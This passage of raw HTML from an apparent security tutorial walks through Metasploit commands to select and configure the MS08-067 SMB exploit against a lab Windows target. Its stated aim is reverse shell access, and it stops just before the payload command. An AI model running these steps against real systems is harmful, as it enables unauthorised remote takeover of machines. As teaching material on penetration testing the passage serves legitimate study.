<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > search smb</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This command would display all the exploits which have an SMB keyword. We can get the information regarding any exploit as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_744161" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > info windows/smb/ms08_067_netapi</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
After being confirmed that the aforesaid exploit fulfills our needs, we therefore pick it up to use as:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_121863" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > use windows/smb/ms08_067_netapi</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This exploit must mandate some parameter configuration in which the RHOST option is the prime property of this exploit, which shall specify the target computer’s IP address. We can set the RHOST as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_894779" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > set RHOST 192.168.40.132</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW7.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW7.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
After using the exploit and setting its option, we have to set the payload, which specifies the precise objective for instant reverse shell access. We can enumerate the payloads related to particular exploit using this command:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_264690" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > show payloads</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
As we are committed to accessing the remote computer shell, we pick the <em>reverse_tcp</em> payload and consume it as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_728036" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
